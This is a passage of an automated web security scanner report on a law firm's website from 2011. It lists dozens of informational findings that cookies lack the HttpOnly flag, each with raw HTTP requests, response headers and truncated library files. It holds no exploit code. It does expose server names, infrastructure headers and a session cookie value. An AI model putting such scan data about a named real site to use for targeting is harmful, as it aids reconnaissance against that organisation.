GET /files/ImageControl/db4a4e6b-0e0c-4e10-ad7f-3f8a91fd6ef1/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 8199
Content-Type: image/gif
Last-Modified: Mon, 21 Feb 2011 01:56:34 GMT
Accept-Ranges: bytes
ETag: "0b55916ad1cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:54 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

GIF89a..W....)))....................................qqq...........................zzz...uuunnn222......'''...


........................xxx.........}}}???...tttDDDEEE............ppp+++.............
...[SNIP]...
18.255. http://www.hunton.com/files/ImageControl/de90a91d-23b9-4df4-84f3-06e0d99ae915/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News_Events.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/ImageControl/de90a91d-23b9-4df4-84f3-06e0d99ae915/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News_Events.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ImageControl/de90a91d-23b9-4df4-84f3-06e0d99ae915/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News_Events.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 4430
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 16:00:30 GMT
Accept-Ranges: bytes
ETag: "0631b90866cc1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:55 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

......Exif..II*.................Ducky.......<.....mhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
18.256. http://www.hunton.com/files/Publication/b1c22611-ccc5-4c3b-aa62-a5f4667f2a5f/Presentation/PublicationAttachment/b83cdb36-b286-49eb-852d-ab18526b1335/martinez_edit9.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /files/Publication/b1c22611-ccc5-4c3b-aa62-a5f4667f2a5f/Presentation/PublicationAttachment/b83cdb36-b286-49eb-852d-ab18526b1335/martinez_edit9.mp4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/Publication/b1c22611-ccc5-4c3b-aa62-a5f4667f2a5f/Presentation/PublicationAttachment/b83cdb36-b286-49eb-852d-ab18526b1335/martinez_edit9.mp4 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/aboutus/uniGC.aspx?xpST=AboutUs
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1844; PortletId=5981402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.4.10.1304742363
Range: bytes=0-

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:27:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 602


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
18.257. http://www.hunton.com/include_common/NetInsight/ntpagetag.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/NetInsight/ntpagetag.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/NetInsight/ntpagetag.gif?js=1&ts=1304742489089.216&lc=about%3Ablank&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 85
Content-Type: image/gif
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:11 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

GIF89a......................................................!......,........@...E.;
18.258. http://www.hunton.com/include_common/NetInsight/ntpagetag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/NetInsight/ntpagetag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/NetInsight/ntpagetag.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 5695
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:53 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

var NTPT_IMGSRC="/include_common/NetInsight/ntpagetag.gif";var NTPT_FLDS=new Object();NTPT_FLDS.lc=true;NTPT_FLDS.rf=true;NTPT_FLDS.rs=true;NTPT_FLDS.cd=true;NTPT_FLDS.ln=true;NTPT_FLDS.tz=true;NTPT_F
...[SNIP]...
18.259. http://www.hunton.com/include_common/jQuery/dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/dimensions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/dimensions.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 24543
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:51 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/license
...[SNIP]...
18.260. http://www.hunton.com/include_common/jQuery/html5media.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/html5media.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/html5media.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 19801
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Apr 2011 21:40:08 GMT
Accept-Ranges: bytes
ETag: "0ac3de10f3cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:02 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

(function(){function v(a){if(!a||typeof a!="object")return a;var c=new a.constructor;for(var e in a)if(a.hasOwnProperty(e))c[e]=v(a[e]);return c}function p(a,c){if(a){var e,b=0,l=a.length;if(l===undef
...[SNIP]...
18.261. http://www.hunton.com/include_common/jQuery/html5mediaConfig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/html5mediaConfig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/html5mediaConfig.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 340
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Apr 2011 21:40:08 GMT
Accept-Ranges: bytes
ETag: "0ac3de10f3cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:05 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

...html5media.flowplayerSwf = "/include_common/FlowPlayer/" + "flowplayer.thomsonreuters-3.0.5.swf";
html5media.flowplayerControlsSwf = "/include_common/FlowPlayer/" + "flowplayer.controls-3.0.3.swf"
...[SNIP]...
18.262. http://www.hunton.com/include_common/jQuery/html5mediaOverlay.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/html5mediaOverlay.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/html5mediaOverlay.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 6527
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:03 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

.../*
Requires jQuery, jquery.tools.1.2.5 (expose)
*/
var activeOverlay = null;
var activeVideo = null;
var html5MediaOverlayDebugMode = false;

function getOverlayHeight(overlayid) {
if (
...[SNIP]...
18.263. http://www.hunton.com/include_common/jQuery/jqDnR.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/jqDnR.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/jqDnR.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1325
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:52 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

/*
* jqDnR - Minimalistic Drag'n'Resize for jQuery.
*
* Copyright (c) 2007 Brice Burgess <bhb@iceburg.net>, http://www.iceburg.net
* Licensed under the MIT License:
* http://www.opensource.o
...[SNIP]...
18.264. http://www.hunton.com/include_common/jQuery/jquery.ajaxQueue.1.3.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/jquery.ajaxQueue.1.3.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/jquery.ajaxQueue.1.3.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 2977
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:10 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

(function($) {

var ajax = $.ajax,
pendingRequests = {},
synced = [],
syncedData = [],
ajaxRunning = [];


$.ajax = function(settings) {
//
...[SNIP]...
18.265. http://www.hunton.com/include_common/jQuery/jquery.autocomplete.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/jquery.autocomplete.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/jquery.autocomplete.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 14103
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:11 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 J..rn Zaefferer
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...
18.266. http://www.hunton.com/include_common/jQuery/jquery.bgiframe.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/jquery.bgiframe.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/jquery.bgiframe.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1411
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:12 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-
...[SNIP]...
18.267. http://www.hunton.com/include_common/jQuery/jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/jquery.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/jquery.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 57272
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:51 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date:
...[SNIP]...
18.268. http://www.hunton.com/include_common/jQuery/jquery.tools.1.2.5.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/jquery.tools.1.2.5.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/jquery.tools.1.2.5.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 5166
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:35 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

/*
* jQuery Tools 1.2.5 - The missing UI library for the Web
*
* [overlay, toolbox.expose]
*
* NO COPYRIGHTS OR LICENSES. DO WHAT YOU LIKE.
*
* http://flowplayer.org/tools/
*
* F
...[SNIP]...
18.269. http://www.hunton.com/include_common/jQuery/packetbuilder.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/packetbuilder.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/packetbuilder.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 12535
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:32 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.../* PDF Packet Builder Script ***********************************************************************************/

//page and control values.
var linkPacketBuilderView = ".packetBuilderView";
v
...[SNIP]...
18.270. http://www.hunton.com/include_common/jQuery/packetviewer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/packetviewer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/packetviewer.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 8674
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:34 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

.../* PDF Packet Viewer Script ***********************************************************************************/

//page and control values.
var linkPacketBuilderGenerate = ".packetBuilderGenera
...[SNIP]...
18.271. http://www.hunton.com/include_common/jQuery/ui.core.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/ui.core.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/ui.core.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
